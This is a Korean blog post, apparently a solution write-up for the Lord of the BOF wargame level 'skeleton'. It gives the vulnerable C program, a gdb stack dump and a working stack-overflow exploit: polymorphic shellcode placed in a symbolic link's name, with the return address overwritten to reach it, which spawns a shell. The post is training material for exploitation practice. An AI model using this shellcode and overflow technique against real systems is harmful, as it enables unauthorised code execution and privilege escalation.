아오 어제 계속 안풀려서 멘붕왔는데 드디어 풀렸네요
문제 풀때 제가했던 뻘짓거리들 입니다
소스를 보면
[vampire@localhost vampire]$ cat skeleton.c
/*
The Lord of the BOF : The Fellowship of the BOF
- skeleton
- argv hunter
*/
#include <stdio.h>
#include <stdlib.h>
extern char **environ;
main(int argc, char *argv[])
{
char buffer[40];
int i, saved_argc;
if(argc < 2){
printf("argv error\n");
exit(0);
}
// egghunter
for(i=0; environ[i]; i++)
memset(environ[i], 0, strlen(environ[i]));
if(argv[1][47] != '\xbf')
{
printf("stack is still your friend.\n");
exit(0);
}
// check the length of argument
if(strlen(argv[1]) > 48){
printf("argument is too long!\n");
exit(0);
}
// argc saver
saved_argc = argc;
strcpy(buffer, argv[1]);
printf("%s\n", buffer);
// buffer hunter
memset(buffer, 0, 40);
// ultra argv hunter!
for(i=0; i<saved_argc; i++)
memset(argv[i], 0, strlen(argv[i]));
}
추가된 부분에 의해서 기존의 사용했던 RTL 방법이라던가 주입식 쉘코드는 사용할수 없게 됩니다
(소스보고 알면서도 자꾸 위의 방법을 써보게되네요 )
굵은 부분이 추가 되었습니다 더불어 저의 멘붕도 추가되었죠
한참헤매다가 나락에서 빛을 보았습니다
계속 디버깅 해보다가 왠지는 모르겟는데 자꾸 맨끝부분에 경로가 남더군요 그래서 이걸 이용해야겠다 싶어서
심볼릭링크를 걸고 retn 주소에 심볼릭링크의 경로부분을 넣어주었습니다
즉, 심볼릭 링크에 다형성 쉘코드를 넣어주었고,
페이로드는 간단합니다
|다형성 쉘코드 argv[0] | buffer[40] | SFP[4] | &다형성 쉘코드 주소 |
따라서 ,
[vampire@localhost /tmp]$ ln -s skeleton `perl -e 'print "\x90"x40,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost /tmp]$ gdb -q `perl -e 'print "\x90"x40,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
(gdb) b *main+368
Breakpoint 1 at 0x8048670
(gdb) r $(perl -e 'print "\xbf"x48')
Starting program: /tmp/????????????????????????????????????????h?須?h
켚Thjo??i0chi0tijY
?y?投T?$(perl -e 'print "\xbf"x48')
옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜옜
Breakpoint 1, 0x8048670 in main ()
(gdb) x/1000x $esp
0xbffffa28: 0x00000002 0x00000002 0x00000000 0x00000000
0xbffffa38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa58: 0xbfbfbfbf 0xbfbfbfbf 0x00000000 0xbffffaa4
0xbffffa68: 0xbffffab0 0x40013868 0x00000002 0x08048450
0xbffffa78: 0x00000000 0x08048471 0x08048500 0x00000002
0xbffffa88: 0xbffffaa4 0x08048390 0x080486ac 0x4000ae60
0xbffffa98: 0xbffffa9c 0x40013e90 0x00000002 0xbffffb9a
0xbffffaa8: 0xbffffbef 0x00000000 0xbffffc20 0xbffffc29
0xbffffab8: 0xbffffc41 0xbffffc60 0xbffffc82 0xbffffc8f
0xbffffac8: 0xbffffe52 0xbffffe71 0xbffffe8e 0xbffffea3
0xbffffad8: 0xbffffec2 0xbffffecd 0xbffffee6 0xbffffef6
0xbffffae8: 0xbffffefe 0xbfffff0f 0xbfffff19 0xbfffff27
0xbffffaf8: 0xbfffff38 0xbfffff46 0xbfffff51 0xbfffff64
0xbffffb08: 0x00000000 0x00000003 0x08048034 0x00000004
0xbffffb18: 0x00000020 0x00000005 0x00000006 0x00000006
0xbffffb28: 0x00001000 0x00000007 0x40000000 0x00000008
0xbffffb38: 0x00000000 0x00000009 0x08048450 0x0000000b
0xbffffb48: 0x000001fd 0x0000000c 0x000001fd 0x0000000d
0xbffffb58: 0x000001fd 0x0000000e 0x000001fd 0x00000010
0xbffffb68: 0x0fabfbff 0x0000000f 0xbffffb95 0x00000000
0xbffffb78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb88: 0x00000000 0x00000000 0x00000000 0x38366900
0xbffffb98: 0x00000036 0x00000000 0x00000000 0x00000000
0xbffffba8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbe8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc68: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffc78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffc98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffca8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffce8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffcf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffd98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffda8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdb8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdc8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdd8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffde8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffdf8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffe98: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffea8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffeb8: 0x00000000 0x00000000 0x00000000 0x00000000
---Type <return> to continue, or q <return> to quit---
0xbffffec8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffed8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffee8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffef8: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff08: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff18: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff28: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff38: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff48: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff58: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff68: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff78: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff88: 0x00000000 0x00000000 0x00000000 0x00000000
0xbfffff98: 0x00000000 0x00000000 0x00000000 0x2f000000
0xbfffffa8: 0x2f706d74 0x90909090 0x90909090 0x90909090
0xbfffffb8: 0x90909090 0x90909090 0x90909090 0x90909090
0xbfffffc8: 0x90909090 0x90909090 0x90909090 0xcee28a68
0xbfffffd8: 0x0cb16881 0x6a685453 0x68e48a6f 0x63306901
0xbfffffe8: 0x74306968 0x59146a69 0x490c0cfe 0xf741fa79
0xbffffff8: 0x00c354e1 0x00000000 Cannot access memory at address 0xc0000000
(gdb)
끝부분을 보면 조금 뭉개지는 부분이 있습니다만 NOP를 넣어서 해결해주었고 , NOP 임의의 부분을 넣어주게 되면
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "\x90"x44,"\xb8\xff\xff\xbf"'`
?????????????????????????????????????????????
bash$ my-pass
euid = 510
shellcoder
bash$
쉘이 따였습니다 ..
'과거의 컴퓨터 공부 > LOB(完)' 카테고리의 다른 글
(LOB)level12.golem (0) | 2014.08.19 |
---|---|
(LOB)Level11.skeleton (0) | 2014.08.16 |
(LOB)Level9.troll (0) | 2014.08.14 |
(LOB)Level8.orge (0) | 2014.08.14 |
(LOB)level7.darkelf (0) | 2014.08.11 |